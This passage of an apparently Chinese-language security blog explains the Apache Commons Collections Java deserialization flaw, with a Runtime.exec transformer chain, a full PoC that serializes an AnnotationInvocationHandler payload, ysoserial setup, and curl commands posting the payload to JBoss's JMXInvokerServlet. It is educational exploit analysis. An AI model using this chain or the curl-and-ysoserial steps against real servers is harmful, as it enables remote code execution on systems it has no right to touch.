class="keyword">return</span> <span class="literal">null</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            <span class="type">Class</span> <span class="variable">cls</span> <span class="operator">=</span> input.getClass();</span><br><span class="line">            <span class="type">Method</span> <span class="variable">method</span> <span class="operator">=</span> cls.getMethod(iMethodName, iParamTypes);</span><br><span class="line">            <span class="keyword">return</span> method.invoke(input, iArgs);</span><br><span class="line"></span><br><span class="line">        &#125; <span class="keyword">catch</span> (NoSuchMethodException ex) &#123;</span><br><span class="line">            <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">FunctorException</span>(<span class="string">&quot;InvokerTransformer: The method &#x27;&quot;</span> + iMethodName + <span class="string">&quot;&#x27; on &#x27;&quot;</span> + input.getClass() + <span class="string">&quot;&#x27; does not exist&quot;</span>);</span><br><span class="line">        &#125; <span class="keyword">catch</span> (IllegalAccessException ex) &#123;</span><br><span class="line">            <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">FunctorException</span>(<span class="string">&quot;InvokerTransformer: The method &#x27;&quot;</span> + iMethodName + <span class="string">&quot;&#x27; on &#x27;&quot;</span> + input.getClass() + <span class="string">&quot;&#x27; cannot be accessed&quot;</span>);</span><br><span class="line">        &#125; <span class="keyword">catch</span> (InvocationTargetException ex) &#123;</span><br><span class="line">            <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">FunctorException</span>(<span class="string">&quot;InvokerTransformer: The method &#x27;&quot;</span> + iMethodName + <span class="string">&quot;&#x27; on &#x27;&quot;</span> + input.getClass() + <span class="string">&quot;&#x27; threw an exception&quot;</span>, ex);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>只需要传入方法名、参数类型和参数，即可调用任意函数。</p>
<p><img src="https://gitee.com/ssooking/imgbed/raw/master/img/WebSecurity/20210727170931.png" alt="img"></p>
<p>　　在这里，我们可以看到，先用ConstantTransformer()获取了Runtime类，接着反射调用getRuntime函数，再调用getRuntime的exec()函数，执行命令””。依次调用关系为： Runtime –&gt; getRuntime –&gt; exec()</p>
<p>　　因此，我们要提前构造 ChainedTransformer链，它会按照我们设定的顺序依次调用Runtime, getRuntime,exec函数，进而执行命令。正式开始时，我们先构造一个TransformeMap实例，然后想办法修改它其中的数据，使其自动调用tansform()方法进行特定的变换(即我们之前设定好的)</p>
<p>再理一遍：</p>
<ol>
<li>构造一个Map和一个能够执行代码的ChainedTransformer，</li>
<li>生成一个TransformedMap实例</li>
<li>利用MapEntry的setValue()函数对TransformedMap中的键值进行修改</li>
<li>触发我们构造的之前构造的链式Transforme（即ChainedTransformer）进行自动转换</li>
</ol>
<p>知识补充</p>
<blockquote>
<p>Map是java中的接口，Map.Entry是Map的一个内部接口。<br>Map提供了一些常用方法，如keySet()、entrySet()等方法。<br>keySet()方法返回值是Map中key值的集合；<br>entrySet()的返回值也是返回一个Set集合，此集合的类型为Map.Entry。<br>Map.Entry是Map声明的一个内部接口，此接口为泛型，定义为Entry&lt;K,V&gt;。它表示Map中的一个实体（一个key-value对）。<br>接口中有getKey(),getValue方法，可以用来对集合中的元素进行修改</p>
</blockquote>
<p>我们可以实现这个思路</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">    <span class="comment">//transformers: 一个transformer链，包含各类transformer对象（预设转化逻辑）的转化数组</span></span><br><span class="line">    Transformer[] transformers = <span class="keyword">new</span> <span class="title class_">Transformer</span>[] &#123;</span><br><span class="line">        <span class="keyword">new</span> <span class="title class_">ConstantTransformer</span>(Runtime.class),</span><br><span class="line">        <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;getMethod&quot;</span>, </span><br><span class="line">            <span class="keyword">new</span> <span class="title class_">Class</span>[] &#123;String.class, Class[].class &#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[] &#123;</span><br><span class="line">            <span class="string">&quot;getRuntime&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[<span class="number">0</span>] &#125;),</span><br><span class="line">        <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;invoke&quot;</span>, </span><br><span class="line">            <span class="keyword">new</span> <span class="title class_">Class</span>[] &#123;Object.class, Object[].class &#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[] &#123;</span><br><span class="line">            <span class="literal">null</span>, <span class="keyword">new</span> <span class="title class_">Object</span>[<span class="number">0</span>] &#125;),</span><br><span class="line">        <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;exec&quot;</span>, </span><br><span class="line">            <span class="keyword">new</span> <span class="title class_">Class</span>[] &#123;String.class &#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[] &#123;<span class="string">&quot;calc.exe&quot;</span>&#125;)&#125;;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//首先构造一个Map和一个能够执行代码的ChainedTransformer，以此生成一个TransformedMap</span></span><br><span class="line">    <span class="type">Transformer</span> <span class="variable">transformedChain</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ChainedTransformer</span>(transformers);</span><br><span class="line"></span><br><span class="line">    <span class="type">Map</span> <span class="variable">innerMap</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">hashMap</span>();</span><br><span class="line">    innerMap.put(<span class="string">&quot;1&quot;</span>, <span class="string">&quot;zhang&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="type">Map</span> <span class="variable">outerMap</span> <span class="operator">=</span> TransformedMap.decorate(innerMap, <span class="literal">null</span>, transformerChain);</span><br><span class="line">    <span class="comment">//触发Map中的MapEntry产生修改（例如setValue()函数</span></span><br><span class="line">    Map.<span class="type">Entry</span> <span class="variable">onlyElement</span> <span class="operator">=</span> (Entry) outerMap.entrySet().iterator().next();</span><br><span class="line"></span><br><span class="line">    onlyElement.setValue(<span class="string">&quot;foobar&quot;</span>);</span><br><span class="line">    <span class="comment">/*代码运行到setValue()时，就会触发ChainedTransformer中的一系列变换函数：</span></span><br><span class="line"><span class="comment">       首先通过ConstantTransformer获得Runtime类</span></span><br><span class="line"><span class="comment">       进一步通过反射调用getMethod找到invoke函数</span></span><br><span class="line"><span class="comment">       最后再运行命令calc.exe。</span></span><br><span class="line"><span class="comment">    */</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><strong>思考</strong></p>
<p>目前的构造还需要依赖于Map中某一项去调用setValue() 怎样才能在调用readObject()方法时直接触发执行呢？</p>
<p><strong>更近一步</strong></p>
<p>　　我们知道，如果一个类的方法被重写，那么在调用这个函数时，会优先调用经过修改的方法。因此，如果某个可序列化的类重写了readObject()方法，并且在readObject()中对Map类型的变量进行了键值修改操作，且这个Map变量是可控的，我么就可以实现攻击目标。</p>
<p>　　于是，我们开始寻寻觅觅，终于，我们找到了~</p>
<p>　　<strong>AnnotationInvocationHandler类</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">这个类有一个成员变量memberValues是Map类型 </span><br><span class="line">更棒的是，AnnotationInvocationHandler的readObject()函数中对memberValues的每一项调用了setValue()函数对value值进行一些变换。</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/ssooking/imgbed/raw/master/img/WebSecurity/20210727170936.png" alt="img"></p>
<p>　　这个类完全符合我们的要求，那么，我们的思路就非常清晰了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">　　1）首先构造一个Map和一个能够执行代码的ChainedTransformer，</span><br><span class="line">　　2）生成一个TransformedMap实例</span><br><span class="line">　　3）实例化AnnotationInvocationHandler，并对其进行序列化，</span><br><span class="line">　　4）当触发readObject()反序列化的时候，就能实现命令执行。</span><br></pre></td></tr></table></figure>

<p>　　POC执行流程为 TransformedMap-&gt;AnnotationInvocationHandler.readObject()-&gt;setValue()- 漏洞成功触发</p>
<p>我们回顾下所有用到的技术细节</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">(1)java方法重写：如果一个类的方法被重写，那么调用该方法时优先调用该方法</span><br><span class="line"></span><br><span class="line">(2)JAVA反射机制：在运行状态中</span><br><span class="line">　　　　　　　　　　　　　对于任意一个类，都能够判断一个对象所属的类；</span><br><span class="line">　　　　　　　　　　　　　对于任意一个类，都能够知道这个类的所有属性和方法；</span><br><span class="line">　　　　　　　　　  　 　对于任意一个对象，都能够调用它的任意一个方法和属性；</span><br><span class="line">(3)认识关键类与函数</span><br><span class="line">    TransformedMap ：      利用其value修改时触发transform()的特性</span><br><span class="line">    ChainedTransformer： 会挨个执行我们定义的Transformer</span><br><span class="line">    Transformer:                 存放我们要执行的命令</span><br><span class="line">    AnnotationInvocationHandler：对memberValues的每一项调用了setValue()函数</span><br></pre></td></tr></table></figure>

<p>具体实现</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> java.io.File;</span><br><span class="line"><span class="keyword">import</span> java.io.FileInputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.FileNotFoundException;</span><br><span class="line"><span class="keyword">import</span> java.io.FileOutputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.IOException;</span><br><span class="line"><span class="keyword">import</span> java.io.ObjectInputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.ObjectOutputStream;</span><br><span class="line"><span class="keyword">import</span> java.lang.annotation.Retention;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Constructor;</span><br><span class="line"><span class="keyword">import</span> java.util.HashMap;</span><br><span class="line"><span class="keyword">import</span> java.util.Map;</span><br><span class="line"><span class="keyword">import</span> java.util.Map.Entry;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.Transformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.ChainedTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.ConstantTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.InvokerTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.map.TransformedMap;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">POC_Test</span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="comment">//execArgs: 待执行的命令数组</span></span><br><span class="line">        <span class="comment">//String[] execArgs = new String[] &#123; &quot;sh&quot;, &quot;-c&quot;, &quot;whoami &gt; /tmp/fuck&quot; &#125;;</span></span><br><span class="line"></span><br><span class="line">        <span class="comment">//transformers: 一个transformer链，包含各类transformer对象（预设转化逻辑）的转化数组</span></span><br><span class="line">        Transformer[] transformers = <span class="keyword">new</span> <span class="title class_">Transformer</span>[] &#123;</span><br><span class="line">            <span class="keyword">new</span> <span class="title class_">ConstantTransformer</span>(Runtime.class),</span><br><span class="line">            <span class="comment">/*</span></span><br><span class="line"><span class="comment">            由于Method类的invoke(Object obj,Object args[])方法的定义</span></span><br><span class="line"><span class="comment">            所以在反射内写new Class[] &#123;Object.class, Object[].class &#125;</span></span><br><span class="line"><span class="comment">            正常POC流程举例：</span></span><br><span class="line"><span class="comment">            ((Runtime)Runtime.class.getMethod(&quot;getRuntime&quot;,null).invoke(null,null)).exec(&quot;gedit&quot;);</span></span><br><span class="line"><span class="comment">            */</span></span><br><span class="line">            <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(</span><br><span class="line">                <span class="string">&quot;getMethod&quot;</span>,</span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">Class</span>[] &#123;String.class, Class[].class &#125;,</span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">Object</span>[] &#123;<span class="string">&quot;getRuntime&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[<span class="number">0</span>] &#125;</span><br><span class="line">            ),</span><br><span class="line">            <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(</span><br><span class="line">                <span class="string">&quot;invoke&quot;</span>,</span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">Class</span>[] &#123;Object.class,Object[].class &#125;, </span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">Object</span>[] &#123;<span class="literal">null</span>, <span class="literal">null</span> &#125;</span><br><span class="line">            ),</span><br><span class="line">            <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(</span><br><span class="line">                <span class="string">&quot;exec&quot;</span>,</span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">Class</span>[] &#123;String[].class &#125;,</span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">Object</span>[] &#123; <span class="string">&quot;whoami&quot;</span> &#125;</span><br><span class="line">                <span class="comment">//new Object[] &#123; execArgs &#125; </span></span><br><span class="line">            )</span><br><span class="line">        &#125;;</span><br><span class="line"></span><br><span class="line">        <span class="comment">//transformedChain: ChainedTransformer类对象，传入transformers数组，可以按照transformers数组的逻辑执行转化操作</span></span><br><span class="line">        <span class="type">Transformer</span> <span class="variable">transformedChain</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ChainedTransformer</span>(transformers);</span><br><span class="line"></span><br><span class="line">        <span class="comment">//BeforeTransformerMap: Map数据结构，转换前的Map，Map数据结构内的对象是键值对形式，类比于python的dict</span></span><br><span class="line">        <span class="comment">//Map&lt;String, String&gt; BeforeTransformerMap = new HashMap&lt;String, String&gt;();</span></span><br><span class="line">        Map&lt;String,String&gt; BeforeTransformerMap = <span class="keyword">new</span> <span class="title class_">HashMap</span>&lt;String,String&gt;();</span><br><span class="line"></span><br><span class="line">        BeforeTransformerMap.put(<span class="string">&quot;hello&quot;</span>, <span class="string">&quot;hello&quot;</span>);</span><br><span class="line"></span><br><span class="line">        <span class="comment">//Map数据结构，转换后的Map</span></span><br><span class="line">       <span class="comment">/*</span></span><br><span class="line"><span class="comment">       TransformedMap.decorate方法,预期是对Map类的数据结构进行转化，该方法有三个参数。</span></span><br><span class="line"><span class="comment">            第一个参数为待转化的Map对象</span></span><br><span class="line"><span class="comment">            第二个参数为Map对象内的key要经过的转化方法（可为单个方法，也可为链，也可为空）</span></span><br><span class="line"><span class="comment">            第三个参数为Map对象内的value要经过的转化方法。</span></span><br><span class="line"><span class="comment">       */</span></span><br><span class="line">        <span class="comment">//TransformedMap.decorate(目标Map, key的转化对象（单个或者链或者null）, value的转化对象（单个或者链或者null）);</span></span><br><span class="line">        <span class="type">Map</span> <span class="variable">AfterTransformerMap</span> <span class="operator">=</span> TransformedMap.decorate(BeforeTransformerMap, <span class="literal">null</span>, transformedChain);</span><br><span class="line"></span><br><span class="line">        <span class="type">Class</span> <span class="variable">cl</span> <span class="operator">=</span> Class.forName(<span class="string">&quot;sun.reflect.annotation.AnnotationInvocationHandler&quot;</span>);</span><br><span class="line"></span><br><span class="line">        <span class="type">Constructor</span> <span class="variable">ctor</span> <span class="operator">=</span> cl.getDeclaredConstructor(Class.class, Map.class);</span><br><span class="line">        ctor.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        <span class="type">Object</span> <span class="variable">instance</span> <span class="operator">=</span> ctor.newInstance(Target.class, AfterTransformerMap);</span><br><span class="line"></span><br><span class="line">        <span class="type">File</span> <span class="variable">f</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">File</span>(<span class="string">&quot;temp.bin&quot;</span>);</span><br><span class="line">        <span class="type">ObjectOutputStream</span> <span class="variable">out</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectOutputStream</span>(<span class="keyword">new</span> <span class="title class_">FileOutputStream</span>(f));</span><br><span class="line">        out.writeObject(instance);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">思路:构建BeforeTransformerMap的键值对，为其赋值，</span></span><br><span class="line"><span class="comment">     利用TransformedMap的decorate方法，对Map数据结构的key/value进行transforme</span></span><br><span class="line"><span class="comment">     对BeforeTransformerMap的value进行转换，当BeforeTransformerMap的value执行完一个完整转换链，就完成了命令执行</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">     执行本质: ((Runtime)Runtime.class.getMethod(&quot;getRuntime&quot;,null).invoke(null,null)).exec(.........)</span></span><br><span class="line"><span class="comment">     利用反射调用Runtime() 执行了一段系统命令, Runtime.getRuntime().exec()</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">*/</span></span><br></pre></td></tr></table></figure>

<h1 id="漏洞挖掘"><a href="#漏洞挖掘" class="headerlink" title="漏洞挖掘"></a>漏洞挖掘</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">1.漏洞触发场景</span><br><span class="line">   在java编写的web应用与web服务器间java通常会发送大量的序列化对象例如以下场景：</span><br><span class="line">　　1)HTTP请求中的参数，cookies以及Parameters。</span><br><span class="line">　　2)RMI协议，被广泛使用的RMI协议完全基于序列化</span><br><span class="line">　　4)JMX 同样用于处理序列化对象</span><br><span class="line">　　5)自定义协议 用来接收与发送原始的java对象</span><br><span class="line"></span><br><span class="line">2. 漏洞挖掘</span><br><span class="line">　　(1)确定反序列化输入点</span><br><span class="line">　　　　首先应找出readObject方法调用，在找到之后进行下一步的注入操作。一般可以通过以下方法进行查找：</span><br><span class="line">　　　　  1)源码审计：寻找可以利用的“靶点”，即确定调用反序列化函数readObject的调用地点。</span><br><span class="line">　　     2)对该应用进行网络行为抓包，寻找序列化数据，如wireshark,tcpdump等</span><br><span class="line">　　　  注： java序列化的数据一般会以标记（ac ed 00 05）开头，base64编码后的特征为rO0AB。</span><br><span class="line">　　(2)再考察应用的Class Path中是否包含Apache Commons Collections库</span><br><span class="line">　　(3)生成反序列化的payload</span><br><span class="line">　　(4)提交我们的payload数据</span><br></pre></td></tr></table></figure>

<h1 id="相关工具"><a href="#相关工具" class="headerlink" title="相关工具"></a>相关工具</h1><p>　　ysoserial是一个用我们刚才的思路生成序列化payload数据的工具。当中针对Apache Commons Collections 3的payload也是基于<code>TransformedMap</code>和<code>InvokerTransformer</code>来构造的，然而在触发时，并没有采用上文介绍的<code>AnnotationInvocationHandler</code>，而是使用了<code>java.lang.reflect.Proxy</code>中的相关代码来实现触发。此处不再做深入分析，有兴趣的读者可以参考ysoserial的源码。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">获取方法</span><br><span class="line"></span><br><span class="line">去github上下载jar发行版：https://github.com/frohoff/ysoserial/releases</span><br><span class="line">wget https://github.com/frohoff/ysoserial/releases/download/v0.0.2/ysoserial-0.0.2-all.jar</span><br><span class="line"></span><br><span class="line">或者自行编译：</span><br><span class="line">git　clone https://github.com/frohoff/ysoserial.git</span><br><span class="line">cd ysoserial</span><br><span class="line">mvn package -DskipTests</span><br></pre></td></tr></table></figure>

<p>相关Tool链接</p>
<p>　　<a class="link"   target="_blank" rel="noopener" href="https://github.com/frohoff/ysoserial" >https://github.com/frohoff/ysoserial<i class="fas fa-external-link-alt"></i></a></p>
<p>　　<a class="link"   target="_blank" rel="noopener" href="https://github.com/CaledoniaProject/jenkins-cli-exploit" >https://github.com/CaledoniaProject/jenkins-cli-exploit<i class="fas fa-external-link-alt"></i></a> </p>
<p>　　<a class="link"   target="_blank" rel="noopener" href="https://github.com/foxglovesec/JavaUnserializeExploits" >https://github.com/foxglovesec/JavaUnserializeExploits<i class="fas fa-external-link-alt"></i></a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">ysoserial</span><br><span class="line">去github上下载jar发行版：https://github.com/frohoff/ysoserial/releases</span><br><span class="line">或者自行编译：</span><br><span class="line">git　clone https://github.com/frohoff/ysoserial.git</span><br><span class="line">cd ysoserial</span><br><span class="line">mvn package -DskipTests </span><br><span class="line">没有mvn的话需要先安装：sudo apt-get install maven</span><br></pre></td></tr></table></figure>

<h1 id="实际漏洞环境测试"><a href="#实际漏洞环境测试" class="headerlink" title="实际漏洞环境测试"></a>实际漏洞环境测试</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">JBOSS</span><br><span class="line"></span><br><span class="line">JBoss是一个管理和运行EJB项目的容器和服务器</span><br><span class="line"></span><br><span class="line">Enterprise JavaBean (EJB)规范定义了开发和部署基于事务性、分布式对象应用程序的服务器端软件组件的体系结构。</span><br><span class="line">企业组织可以构建它们自己的组件，或从第三方供应商购买组件。</span><br><span class="line">这些服务器端组件称作 Enterprise Bean，它们是 Enterprise JavaBean 容器中驻留的分布式对象，为分布在网络中的客户机提供远程服务。</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/ssooking/imgbed/raw/master/img/WebSecurity/20210727170944.png" alt="img"></p>
<p>实际测试版本</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">Jboss6.1</span><br><span class="line"></span><br><span class="line">Download: http://jbossas.jboss.org/downloads/</span><br><span class="line">Unzip: unzip jboss-as-7.1.1.Final.zip</span><br><span class="line"></span><br><span class="line">修改配置文件，修改默认访问端口，设置外部可访问</span><br><span class="line"> vi  /server/default/deploy/jbossweb.sar/server.xml</span><br><span class="line">运行服务</span><br><span class="line">iptables -I INPUT -p tcp --dport 80 -j ACCEPT</span><br><span class="line">sh jbosspath/bin/run.sh -b 0.0.0.0        </span><br><span class="line"></span><br><span class="line">关闭服务器</span><br><span class="line">sh jbosspath/bin/shutdown.sh -S</span><br><span class="line"></span><br><span class="line">测试</span><br><span class="line">http://ip:8080</span><br><span class="line">http://ip:8080/web-console</span><br></pre></td></tr></table></figure>

<p>　补充：CentOS默认开启了防火墙，所以80端口是不能正常访问的)，输入命令：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">　iptables -I INPUT -p tcp --dport 80 -j ACCEPT</span><br></pre></td></tr></table></figure>

<p>　　这里以Jboss为例。Jboss利用的是HTTP协议，可以在任何端口上运行，默认安装在8080端口中。</p>
<p>　　Jboss与“JMXInvokerServlet”的<a class="link"   target="_blank" rel="noopener" href="http://telecom.chinabyte.com/" >通信<i class="fas fa-external-link-alt"></i></a>过程中存在一个公开漏洞。JMX是一个java的管理协议，在Jboss中的JMXInvokerServlet可以使用HTTP协议与其进行通话。这一通信功能依赖于java的序列化类。在默认安装的Jboss中，JMXInvokerServlet的路径恰好为<a class="link"   target="_blank" rel="noopener" href="http://localhost:8080/invoker/JMXInvokerServlet%E3%80%82" >http://localhost:8080/invoker/JMXInvokerServlet。<i class="fas fa-external-link-alt"></i></a></p>
<p>　　如果用户访问一个该url，实际上会返回一个原始的java对象，这种行为显然存在一个漏洞。但由于jmxinvokerservlet与主要的Web应用程序在同一个端口上运行，因此它很少被防火墙所拦截这个漏洞可以很经常的通过互联网被利用。</p>
<p>　　因此，可以以jmx作为Jboss接受外部输入的点，可以利用java HTTP client包构建POST请求，post请求包中数据为使用ysoserial处理之后的构建代码</p>
<p>通常的测试可以使用的命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">搜索匹配&quot;readObject&quot;靶点</span><br><span class="line">　　 grep -nr &quot;readObject&quot; *</span><br><span class="line">测试是否含该漏洞的jar包文件</span><br><span class="line">    grep -R InvokerTransformer</span><br><span class="line">生成序列化payload数据</span><br><span class="line">    java -jar ysoserial-0.0.4-all.jar CommonsCollections1 &#x27;想要执行的命令&#x27; &gt; payload.out</span><br><span class="line">提交payload数据</span><br><span class="line">　　curl --header &#x27;Content-Type: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue&#x27; --data-binary &#x27;@payload.out&#x27; http://ip:8080/invoker/JMXInvokerServlet</span><br><span class="line">exploit例子</span><br><span class="line">java -jar  ysoserial-0.0.2-all.jar   CommonsCollections1  &#x27;echo 1 &gt; /tmp/pwned&#x27;  &gt;  payload</span><br><span class="line">curl --header &#x27;Content-Type: application/x-java-serialized-object; class=&quot;org&quot;.jboss.invocation.MarshalledValue&#x27; --data-binary &#x27;@/tmp/payload&#x27; http://127.0.0.1:8080/invoker/JMXInvokerServlet</span><br></pre></td></tr></table></figure>

<p>我们提交payload数据时，可以抓取数据包进行分析，看起来大概像这个样子（图片不是自己环境测试中的）</p>
<p><img src="https://gitee.com/ssooking/imgbed/raw/master/img/WebSecurity/20210727170949.png" alt="img"> </p>
<hr>
<p><strong>总结</strong></p>
